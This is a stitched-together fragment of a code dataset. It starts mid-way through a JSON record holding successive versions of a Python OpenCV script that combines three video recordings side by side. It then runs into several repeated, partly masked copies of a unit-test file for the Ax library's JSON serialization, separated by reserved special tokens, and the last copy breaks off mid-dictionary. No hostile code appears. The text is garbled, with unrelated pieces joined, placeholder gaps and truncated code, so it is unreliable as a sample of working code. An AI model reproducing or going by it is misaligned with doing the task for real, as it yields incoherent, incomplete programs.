RIGHT_SYNC_2 -\n LEFT_SYNC_2)):\n _, right_frame = reader1.read()\n new_frame = np.concatenate([filler, border, right_frame], axis=1)\n writer.write(new_frame)\nfor fid in tqdm(range(RIGHT_SYNC_2 - LEFT_SYNC_2, fc1)):\n r1, right_frame = reader1.read()\n if not r1:\n break\n r3, left_frame = reader3.read()\n if not r3:\n left_frame = filler\n else:\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n writer.write(new_frame)\nreader1.release()\nreader2.release()\nwriter.release()\ncv2.destroyAllWindows()\n",
"step-3": "<mask token>\nDIR = '/home/nghiatruong/Desktop'\nINPUT_1 = os.path.join(DIR, 'GOPR1806.MP4')\nINPUT_2 = os.path.join(DIR, '20190715_180940.mp4')\nINPUT_3 = os.path.join(DIR, '20190715_181200.mp4')\nRIGHT_SYNC_1 = 1965\nLEFT_SYNC_1 = 1700\nRIGHT_SYNC_2 = 5765\nLEFT_SYNC_2 = 1282\n\n\ndef add_frame_id(video, output_dir):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return -1\n os.makedirs(output_dir, exist_ok=True)\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n for frame_id in tqdm(range(frame_count)):\n has_frame, frame = reader.read()\n if not has_frame:\n break\n cv2.imwrite(os.path.join(output_dir, f'{frame_id}.jpg'), frame)\n reader.release()\n return 0\n\n\ndef get_meta(video):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return None, None, None\n width = int(reader.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(reader.get(cv2.CAP_PROP_FRAME_HEIGHT))\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n return width, height, frame_count\n\n\nw1, h1, fc1 = get_meta(INPUT_1)\nh2, w2, fc2 = get_meta(INPUT_2)\nratio = h1 / h2\nw2 = int(w2 * ratio) + 1\nfourcc = cv2.VideoWriter_fourcc(*'MJPG')\nwriter = cv2.VideoWriter(os.path.join(DIR, 'output.avi'), fourcc, 29.97, (\n w1 + w2 + 10, h1))\nborder = np.zeros((h1, 10, 3), dtype='uint8')\nfiller = np.zeros((h1, w2, 3), dtype='uint8')\nreader1 = cv2.VideoCapture(INPUT_1)\nreader2 = cv2.VideoCapture(INPUT_2)\nreader3 = cv2.VideoCapture(INPUT_3)\nlast_shape = h1, w1 + w2 + 10, 3\nfor fid in tqdm(range(fc2 + RIGHT_SYNC_1 - LEFT_SYNC_1)):\n _, right_frame = reader1.read()\n if fid < RIGHT_SYNC_1 - LEFT_SYNC_1:\n left_frame = filler\n else:\n _, left_frame = reader2.read()\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n writer.write(new_frame)\nfor fid in tqdm(range(fc2 + RIGHT_SYNC_1 - LEFT_SYNC_1, RIGHT_SYNC_2 -\n LEFT_SYNC_2)):\n _, right_frame = reader1.read()\n new_frame = np.concatenate([filler, border, right_frame], axis=1)\n writer.write(new_frame)\nfor fid in tqdm(range(RIGHT_SYNC_2 - LEFT_SYNC_2, fc1)):\n r1, right_frame = reader1.read()\n if not r1:\n break\n r3, left_frame = reader3.read()\n if not r3:\n left_frame = filler\n else:\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n writer.write(new_frame)\nreader1.release()\nreader2.release()\nwriter.release()\ncv2.destroyAllWindows()\n",
"step-4": "import cv2\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nDIR = '/home/nghiatruong/Desktop'\nINPUT_1 = os.path.join(DIR, 'GOPR1806.MP4')\nINPUT_2 = os.path.join(DIR, '20190715_180940.mp4')\nINPUT_3 = os.path.join(DIR, '20190715_181200.mp4')\nRIGHT_SYNC_1 = 1965\nLEFT_SYNC_1 = 1700\nRIGHT_SYNC_2 = 5765\nLEFT_SYNC_2 = 1282\n\n\ndef add_frame_id(video, output_dir):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return -1\n os.makedirs(output_dir, exist_ok=True)\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n for frame_id in tqdm(range(frame_count)):\n has_frame, frame = reader.read()\n if not has_frame:\n break\n cv2.imwrite(os.path.join(output_dir, f'{frame_id}.jpg'), frame)\n reader.release()\n return 0\n\n\ndef get_meta(video):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return None, None, None\n width = int(reader.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(reader.get(cv2.CAP_PROP_FRAME_HEIGHT))\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n return width, height, frame_count\n\n\nw1, h1, fc1 = get_meta(INPUT_1)\nh2, w2, fc2 = get_meta(INPUT_2)\nratio = h1 / h2\nw2 = int(w2 * ratio) + 1\nfourcc = cv2.VideoWriter_fourcc(*'MJPG')\nwriter = cv2.VideoWriter(os.path.join(DIR, 'output.avi'), fourcc, 29.97, (\n w1 + w2 + 10, h1))\nborder = np.zeros((h1, 10, 3), dtype='uint8')\nfiller = np.zeros((h1, w2, 3), dtype='uint8')\nreader1 = cv2.VideoCapture(INPUT_1)\nreader2 = cv2.VideoCapture(INPUT_2)\nreader3 = cv2.VideoCapture(INPUT_3)\nlast_shape = h1, w1 + w2 + 10, 3\nfor fid in tqdm(range(fc2 + RIGHT_SYNC_1 - LEFT_SYNC_1)):\n _, right_frame = reader1.read()\n if fid < RIGHT_SYNC_1 - LEFT_SYNC_1:\n left_frame = filler\n else:\n _, left_frame = reader2.read()\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n writer.write(new_frame)\nfor fid in tqdm(range(fc2 + RIGHT_SYNC_1 - LEFT_SYNC_1, RIGHT_SYNC_2 -\n LEFT_SYNC_2)):\n _, right_frame = reader1.read()\n new_frame = np.concatenate([filler, border, right_frame], axis=1)\n writer.write(new_frame)\nfor fid in tqdm(range(RIGHT_SYNC_2 - LEFT_SYNC_2, fc1)):\n r1, right_frame = reader1.read()\n if not r1:\n break\n r3, left_frame = reader3.read()\n if not r3:\n left_frame = filler\n else:\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n writer.write(new_frame)\nreader1.release()\nreader2.release()\nwriter.release()\ncv2.destroyAllWindows()\n",
"step-5": "import cv2\nimport numpy as np\nimport os\nfrom tqdm import tqdm\n\n\nDIR = '/home/nghiatruong/Desktop'\nINPUT_1 = os.path.join(DIR, 'GOPR1806.MP4')\nINPUT_2 = os.path.join(DIR, '20190715_180940.mp4')\nINPUT_3 = os.path.join(DIR, '20190715_181200.mp4')\nRIGHT_SYNC_1 = 1965\nLEFT_SYNC_1 = 1700\nRIGHT_SYNC_2 = 5765\nLEFT_SYNC_2 = 1282\n\n\ndef add_frame_id(video, output_dir):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return -1\n os.makedirs(output_dir, exist_ok=True)\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n\n for frame_id in tqdm(range(frame_count)):\n has_frame, frame = reader.read()\n if not has_frame:\n break\n cv2.imwrite(os.path.join(output_dir, f'{frame_id}.jpg'), frame)\n\n reader.release()\n return 0\n\n\ndef get_meta(video):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return None, None, None\n width = int(reader.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(reader.get(cv2.CAP_PROP_FRAME_HEIGHT))\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n return width, height, frame_count\n\n\nw1, h1, fc1 = get_meta(INPUT_1)\nh2, w2, fc2 = get_meta(INPUT_2)\nratio = h1 / h2\nw2 = int(w2*ratio)+1\nfourcc = cv2.VideoWriter_fourcc(*'MJPG')\nwriter = cv2.VideoWriter(os.path.join(DIR, 'output.avi'), fourcc, 29.97, (w1+w2+10, h1))\nborder = np.zeros((h1, 10, 3), dtype='uint8')\nfiller = np.zeros((h1, w2, 3), dtype='uint8')\n\nreader1 = cv2.VideoCapture(INPUT_1)\nreader2 = cv2.VideoCapture(INPUT_2)\nreader3 = cv2.VideoCapture(INPUT_3)\n\nlast_shape = (h1, w1+w2+10, 3)\nfor fid in tqdm(range(fc2+RIGHT_SYNC_1-LEFT_SYNC_1)):\n _, right_frame = reader1.read()\n if fid < RIGHT_SYNC_1-LEFT_SYNC_1:\n left_frame = filler\n else:\n _, left_frame = reader2.read()\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n # cv2.imshow('out', new_frame)\n writer.write(new_frame)\n # if cv2.waitKey(1) & 0xFF == ord('q'):\n # break\n\nfor fid in tqdm(range(fc2+RIGHT_SYNC_1-LEFT_SYNC_1, RIGHT_SYNC_2-LEFT_SYNC_2)):\n _, right_frame = reader1.read()\n new_frame = np.concatenate([filler, border, right_frame], axis=1)\n # cv2.imshow('out', new_frame)\n writer.write(new_frame)\n # if cv2.waitKey(1) & 0xFF == ord('q'):\n # break\n\nfor fid in tqdm(range(RIGHT_SYNC_2-LEFT_SYNC_2, fc1)):\n r1, right_frame = reader1.read()\n if not r1:\n break\n r3, left_frame = reader3.read()\n if not r3:\n left_frame = filler\n else:\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n # cv2.imshow('out', new_frame)\n writer.write(new_frame)\n # if cv2.waitKey(1) & 0xFF == ord('q'):\n # break\n\n\nreader1.release()\nreader2.release()\nwriter.release()\ncv2.destroyAllWindows()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class JSONStoreTest(TestCase):
def setUp(self):
self.experiment = get_experiment_with_batch_and_single_trial()
def testJSONEncodeFailure(self):
self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(
'foobar'))
def testJSONDecodeFailure(self):
self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(
'foobar'))
self.assertRaises(JSONDecodeError, object_from_json, {'__type':
'foobar'})
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testValidateFilename(self):
bad_filename = 'test'
self.assertRaises(ValueError, save_experiment, self.experiment,
bad_filename)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testEncodeDecodeNumpy(self):
arr = np.array([[1, 2, 3], [4, 5, 6]])
self.assertTrue(np.array_equal(arr, object_from_json(object_to_json
(arr))))
def testEncodeDecodeSimpleBenchmarkProblem(self):
branin_problem = get_branin_simple_benchmark_problem()
sum_problem = get_sum_simple_benchmark_problem()
new_branin_problem = object_from_json(object_to_json(branin_problem))
new_sum_problem = object_from_json(object_to_json(sum_problem))
self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),
branin(1, 2))
self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)
ackley_problem = SimpleBenchmarkProblem(f=from_botorch(Ackley()),
noise_sd=0.0, minimize=True)
new_ackley_problem = object_from_json(object_to_json(ackley_problem))
self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),
ackley(1, 2))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class JSONStoreTest(TestCase):
def setUp(self):
self.experiment = get_experiment_with_batch_and_single_trial()
def testJSONEncodeFailure(self):
self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(
'foobar'))
def testJSONDecodeFailure(self):
self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(
'foobar'))
self.assertRaises(JSONDecodeError, object_from_json, {'__type':
'foobar'})
def testSaveAndLoad(self):
with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=
'.json') as f:
save_experiment(self.experiment, f.name)
loaded_experiment = load_experiment(f.name)
self.assertEqual(loaded_experiment, self.experiment)
os.remove(f.name)
<|reserved_special_token_0|>
def testValidateFilename(self):
bad_filename = 'test'
self.assertRaises(ValueError, save_experiment, self.experiment,
bad_filename)
<|reserved_special_token_0|>
def testEncodeDecodeTorchTensor(self):
x = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64,
device=torch.device('cpu'))
expected_json = {'__type': 'Tensor', 'value': [[1.0, 2.0], [3.0,
4.0]], 'dtype': {'__type': 'torch_dtype', 'value':
'torch.float64'}, 'device': {'__type': 'torch_device', 'value':
'cpu'}}
x_json = object_to_json(x)
self.assertEqual(expected_json, x_json)
x2 = object_from_json(x_json)
self.assertTrue(torch.equal(x, x2))
def testDecodeGenerationStrategy(self):
generation_strategy = get_generation_strategy()
experiment = get_branin_experiment()
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertGreater(len(new_generation_strategy._steps), 0)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsNone(new_generation_strategy.model)
generation_strategy = get_generation_strategy(with_callable_model_kwarg
=False)
gr = generation_strategy.gen(experiment)
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
generation_strategy = new_generation_strategy
experiment.new_trial(gr)
generation_strategy.gen(experiment, data=get_branin_data())
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
def testEncodeDecodeNumpy(self):
arr = np.array([[1, 2, 3], [4, 5, 6]])
self.assertTrue(np.array_equal(arr, object_from_json(object_to_json
(arr))))
def testEncodeDecodeSimpleBenchmarkProblem(self):
branin_problem = get_branin_simple_benchmark_problem()
sum_problem = get_sum_simple_benchmark_problem()
new_branin_problem = object_from_json(object_to_json(branin_problem))
new_sum_problem = object_from_json(object_to_json(sum_problem))
self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),
branin(1, 2))
self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)
ackley_problem = SimpleBenchmarkProblem(f=from_botorch(Ackley()),
noise_sd=0.0, minimize=True)
new_ackley_problem = object_from_json(object_to_json(ackley_problem))
self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),
ackley(1, 2))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class JSONStoreTest(TestCase):
def setUp(self):
self.experiment = get_experiment_with_batch_and_single_trial()
def testJSONEncodeFailure(self):
self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(
'foobar'))
def testJSONDecodeFailure(self):
self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(
'foobar'))
self.assertRaises(JSONDecodeError, object_from_json, {'__type':
'foobar'})
def testSaveAndLoad(self):
with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=
'.json') as f:
save_experiment(self.experiment, f.name)
loaded_experiment = load_experiment(f.name)
self.assertEqual(loaded_experiment, self.experiment)
os.remove(f.name)
def testSaveValidation(self):
with self.assertRaises(ValueError):
save_experiment(self.experiment.trials[0], 'test.json')
def testValidateFilename(self):
bad_filename = 'test'
self.assertRaises(ValueError, save_experiment, self.experiment,
bad_filename)
<|reserved_special_token_0|>
def testEncodeDecodeTorchTensor(self):
x = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64,
device=torch.device('cpu'))
expected_json = {'__type': 'Tensor', 'value': [[1.0, 2.0], [3.0,
4.0]], 'dtype': {'__type': 'torch_dtype', 'value':
'torch.float64'}, 'device': {'__type': 'torch_device', 'value':
'cpu'}}
x_json = object_to_json(x)
self.assertEqual(expected_json, x_json)
x2 = object_from_json(x_json)
self.assertTrue(torch.equal(x, x2))
def testDecodeGenerationStrategy(self):
generation_strategy = get_generation_strategy()
experiment = get_branin_experiment()
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertGreater(len(new_generation_strategy._steps), 0)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsNone(new_generation_strategy.model)
generation_strategy = get_generation_strategy(with_callable_model_kwarg
=False)
gr = generation_strategy.gen(experiment)
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
generation_strategy = new_generation_strategy
experiment.new_trial(gr)
generation_strategy.gen(experiment, data=get_branin_data())
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
def testEncodeDecodeNumpy(self):
arr = np.array([[1, 2, 3], [4, 5, 6]])
self.assertTrue(np.array_equal(arr, object_from_json(object_to_json
(arr))))
def testEncodeDecodeSimpleBenchmarkProblem(self):
branin_problem = get_branin_simple_benchmark_problem()
sum_problem = get_sum_simple_benchmark_problem()
new_branin_problem = object_from_json(object_to_json(branin_problem))
new_sum_problem = object_from_json(object_to_json(sum_problem))
self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),
branin(1, 2))
self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)
ackley_problem = SimpleBenchmarkProblem(f=from_botorch(Ackley()),
noise_sd=0.0, minimize=True)
new_ackley_problem = object_from_json(object_to_json(ackley_problem))
self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),
ackley(1, 2))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testDecodeUnknownClassFromJson(self):
with self.assertRaisesRegex(ValueError,
'does not have a corresponding entry in CLASS_TO_REVERSE_REGISTRY'
):
class_from_json({'index': 0, 'class': 'unknown_path'})
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class JSONStoreTest(TestCase):
def setUp(self):
self.experiment = get_experiment_with_batch_and_single_trial()
def testJSONEncodeFailure(self):
self.assertRaises(JSONEncodeError, object_to_json, RuntimeError(
'foobar'))
def testJSONDecodeFailure(self):
self.assertRaises(JSONDecodeError, object_from_json, RuntimeError(
'foobar'))
self.assertRaises(JSONDecodeError, object_from_json, {'__type':
'foobar'})
def testSaveAndLoad(self):
with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=
'.json') as f:
save_experiment(self.experiment, f.name)
loaded_experiment = load_experiment(f.name)
self.assertEqual(loaded_experiment, self.experiment)
os.remove(f.name)
def testSaveValidation(self):
with self.assertRaises(ValueError):
save_experiment(self.experiment.trials[0], 'test.json')
def testValidateFilename(self):
bad_filename = 'test'
self.assertRaises(ValueError, save_experiment, self.experiment,
bad_filename)
<|reserved_special_token_0|>
def testEncodeDecodeTorchTensor(self):
x = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64,
device=torch.device('cpu'))
expected_json = {'__type': 'Tensor', 'value': [[1.0, 2.0], [3.0,
4.0]], 'dtype': {'__type': 'torch_dtype', 'value':
'torch.float64'}, 'device': {'__type': 'torch_device', 'value':
'cpu'}}
x_json = object_to_json(x)
self.assertEqual(expected_json, x_json)
x2 = object_from_json(x_json)
self.assertTrue(torch.equal(x, x2))
def testDecodeGenerationStrategy(self):
generation_strategy = get_generation_strategy()
experiment = get_branin_experiment()
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertGreater(len(new_generation_strategy._steps), 0)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsNone(new_generation_strategy.model)
generation_strategy = get_generation_strategy(with_callable_model_kwarg
=False)
gr = generation_strategy.gen(experiment)
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
generation_strategy = new_generation_strategy
experiment.new_trial(gr)
generation_strategy.gen(experiment, data=get_branin_data())
gs_json = object_to_json(generation_strategy)
new_generation_strategy = generation_strategy_from_json(gs_json)
self.assertEqual(generation_strategy, new_generation_strategy)
self.assertIsInstance(new_generation_strategy._steps[0].model, Models)
self.assertIsInstance(new_generation_strategy.model, ModelBridge)
def testEncodeDecodeNumpy(self):
arr = np.array([[1, 2, 3], [4, 5, 6]])
self.assertTrue(np.array_equal(arr, object_from_json(object_to_json
(arr))))
def testEncodeDecodeSimpleBenchmarkProblem(self):
branin_problem = get_branin_simple_benchmark_problem()
sum_problem = get_sum_simple_benchmark_problem()
new_branin_problem = object_from_json(object_to_json(branin_problem))
new_sum_problem = object_from_json(object_to_json(sum_problem))
self.assertEqual(branin_problem.f(1, 2), new_branin_problem.f(1, 2),
branin(1, 2))
self.assertEqual(sum_problem.f([1, 2]), new_sum_problem.f([1, 2]), 3)
ackley_problem = SimpleBenchmarkProblem(f=from_botorch(Ackley()),
noise_sd=0.0, minimize=True)
new_ackley_problem = object_from_json(object_to_json(ackley_problem))
self.assertEqual(ackley_problem.f(1, 2), new_ackley_problem.f(1, 2),
ackley(1, 2))
def testRegistryAdditions(self):
class MyRunner(Runner):
def run():
pass
def staging_required():
return False
class MyMetric(Metric):
pass
register_metric(MyMetric)
register_runner(MyRunner)
experiment = get_experiment_with_batch_and_single_trial()
experiment.runner = MyRunner()
experiment.add_tracking_metric(MyMetric(name='my_metric'))
with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix=
'.json') as f:
save_experiment(experiment, f.name)
loaded_experiment = load_experiment(f.name)
self.assertEqual(loaded_experiment, experiment)
os.remove(f.name)
def testEncodeUnknownClassToDict(self):
class UnknownClass:
def __init__(self):
pass
with self.assertRaisesRegex(ValueError,
'is a class. Add it to the CLASS_ENCODER_REGISTRY'):
object_to_json(UnknownClass)
CLASS_ENCODER_REGISTRY[UnknownClass] = botorch_modular_to_dict
with self.assertRaisesRegex(ValueError,
'does not have a corresponding parent class in CLASS_TO_REGISTRY'):
object_to_json(UnknownClass)
def testDecodeUnknownClassFromJson(self):
with self.assertRaisesRegex(ValueError,
'does not have a corresponding entry in CLASS_TO_REVERSE_REGISTRY'
):
class_from_json({'index': 0, 'class': 'unknown_path'})
<|reserved_special_token_1|>
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import tempfile
from functools import partial
import numpy as np
import torch
from ax.benchmark.benchmark_problem import SimpleBenchmarkProblem
from ax.core.metric import Metric
from ax.core.runner import Runner
from ax.exceptions.storage import JSONDecodeError, JSONEncodeError
from ax.modelbridge.base import ModelBridge
from ax.modelbridge.registry import Models
from ax.storage.json_store.decoder import (
generation_strategy_from_json,
object_from_json,
)
from ax.storage.json_store.decoders import class_from_json
from ax.storage.json_store.encoder import object_to_json
from ax.storage.json_store.encoders import botorch_modular_to_dict
from ax.storage.json_store.load import load_experiment
from ax.storage.json_store.registry import CLASS_ENCODER_REGISTRY
from ax.storage.json_store.save import save_experiment
from ax.storage.metric_registry import register_metric
from ax.storage.runner_registry import register_runner
from ax.utils.common.testutils import TestCase
from ax.utils.measurement.synthetic_functions import ackley, branin, from_botorch
from ax.utils.testing.benchmark_stubs import (
get_branin_benchmark_problem,
get_branin_simple_benchmark_problem,
get_mult_simple_benchmark_problem,
get_sum_simple_benchmark_problem,
)
from ax.utils.testing.core_stubs import (
get_abandoned_arm,
get_acquisition_function_type,
get_acquisition_type,
get_arm,
get_augmented_branin_metric,
get_augmented_hartmann_metric,
get_batch_trial,
get_botorch_model,
get_botorch_model_with_default_acquisition_class,
get_branin_data,
get_branin_experiment,
get_branin_metric,
get_choice_parameter,
get_experiment_with_batch_and_single_trial,
get_experiment_with_data,
get_experiment_with_trial_with_ttl,
get_experiment_with_map_data_type,
get_factorial_metric,
get_fixed_parameter,
get_generator_run,
get_map_data,
get_hartmann_metric,
get_list_surrogate,
get_metric,
get_mll_type,
get_model_type,
get_multi_objective,
get_multi_objective_optimization_config,
get_multi_type_experiment,
get_objective,
get_objective_threshold,
get_optimization_config,
get_order_constraint,
get_outcome_constraint,
get_parameter_constraint,
get_percentile_early_stopping_strategy,
get_range_parameter,
get_scalarized_objective,
get_search_space,
get_simple_experiment_with_batch_trial,
get_sum_constraint1,
get_sum_constraint2,
get_surrogate,
get_synthetic_runner,
get_trial,
)
from ax.utils.testing.modeling_stubs import (
get_generation_strategy,
get_observation_features,
get_transform_type,
)
from botorch.test_functions.synthetic import Ackley
TEST_CASES = [
("AbandonedArm", get_abandoned_arm),
("Arm", get_arm),
("AugmentedBraninMetric", get_augmented_branin_metric),
("AugmentedHartmannMetric", get_augmented_hartmann_metric),
("BatchTrial", get_batch_trial),
("BenchmarkProblem", get_branin_benchmark_problem),
("BoTorchModel", get_botorch_model),
("BoTorchModel", get_botorch_model_with_default_acquisition_class),
("BraninMetric", get_branin_metric),
("ChoiceParameter", get_choice_parameter),
("Experiment", get_experiment_with_batch_and_single_trial),
("Experiment", get_experiment_with_trial_with_ttl),
("Experiment", get_experiment_with_data),
("Experiment", get_experiment_with_map_data_type),
("FactorialMetric", get_factorial_metric),
("FixedParameter", get_fixed_parameter),
("Hartmann6Metric", get_hartmann_metric),
("GenerationStrategy", partial(get_generation_strategy, with_experiment=True)),
("GeneratorRun", get_generator_run),
("ListSurrogate", get_list_surrogate),
("MapData", get_map_data),
("Metric", get_metric),
("MultiObjective", get_multi_objective),
("MultiObjectiveOptimizationConfig", get_multi_objective_optimization_config),
("MultiTypeExperiment", get_multi_type_experiment),
("ObservationFeatures", get_observation_features),
("Objective", get_objective),
("ObjectiveThreshold", get_objective_threshold),
("OptimizationConfig", get_optimization_config),
("OrderConstraint", get_order_constraint),
("OutcomeConstraint", get_outcome_constraint),
("PercentileEarlyStoppingStrategy", get_percentile_early_stopping_strategy),
("ParameterConstraint", get_parameter_constraint),
("RangeParameter", get_range_parameter),
("ScalarizedObjective", get_scalarized_objective),
("SearchSpace", get_search_space),
("SimpleBenchmarkProblem", get_mult_simple_benchmark_problem),
("SimpleBenchmarkProblem", get_branin_simple_benchmark_problem),
("SimpleBenchmarkProblem", get_sum_simple_benchmark_problem),
("SimpleExperiment", get_simple_experiment_with_batch_trial),
("SumConstraint", get_sum_constraint1),
("SumConstraint", get_sum_constraint2),
("Surrogate", get_surrogate),
("SyntheticRunner", get_synthetic_runner),
("Type[Acquisition]", get_acquisition_type),
("Type[AcquisitionFunction]", get_acquisition_function_type),
("Type[Model]", get_model_type),
("Type[MarginalLogLikelihood]", get_mll_type),
("Type[Transform]", get_transform_type),
("Trial", get_trial),
]
class JSONStoreTest(TestCase):
def setUp(self):
self.experiment = get_experiment_with_batch_and_single_trial()
def testJSONEncodeFailure(self):
self.assertRaises(JSONEncodeError, object_to_json, RuntimeError("foobar"))
def testJSONDecodeFailure(self):
self.assertRaises(JSONDecodeError, object_from_json, RuntimeError("foobar"))
self.assertRaises(JSONDecodeError, object_from_json, {"__type": "foobar"})
def testSaveAndLoad(self):
with tempfile.NamedTemporaryFile(mode="w+", delete=False, suffix=".json") as f:
save_experiment(self.experiment, f.name)
loaded_experiment = load_experiment(f.name)
self.assertEqual(loaded_experiment, self.experiment)
os.remove(f.name)
def testSaveValidation(self):
with self.assertRaises(ValueError):
save_experiment(self.experiment.trials[0], "test.json")
def testValidateFilename(self):
bad_filename = "test"
self.assertRaises(ValueError, save_experiment, self.experiment, bad_filename)
def testEncodeDecode(self):
for class_, fake_func in TEST_CASES:
# Can't load trials from JSON, because a batch needs an experiment
# in order to be initialized
if class_ == "BatchTrial" or class_ == "Trial":
continue
# Can't load parameter constraints from JSON, because they require
# a SearchSpace in order to be initialized
if class_ == "OrderConstraint" or class_ == "SumConstraint":
continue
original_object = fake_func()
json_object = object_to_json(original_object)
converted_object = object_from_json(json_object)
if class_ == "SimpleExperiment":
# Evaluation functions will be different, so need to do
# this so equality test passes
with self.assertRaises(RuntimeError):
converted_object.evaluation_function(parameterization={})
original_object.evaluation_function = None
converted_object.evaluation_function = None
self.assertEqual(
original_object,
converted_object,
msg=f"Error encoding/decoding {class_}.",
)
def testEncodeDecodeTorchTensor(self):
x = torch.tensor(
[[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64, device=torch.device("cpu")
)
expected_json = {
"__type": "Tensor",
"value": [[1.0, 2.0], [3.0, 4.0]],
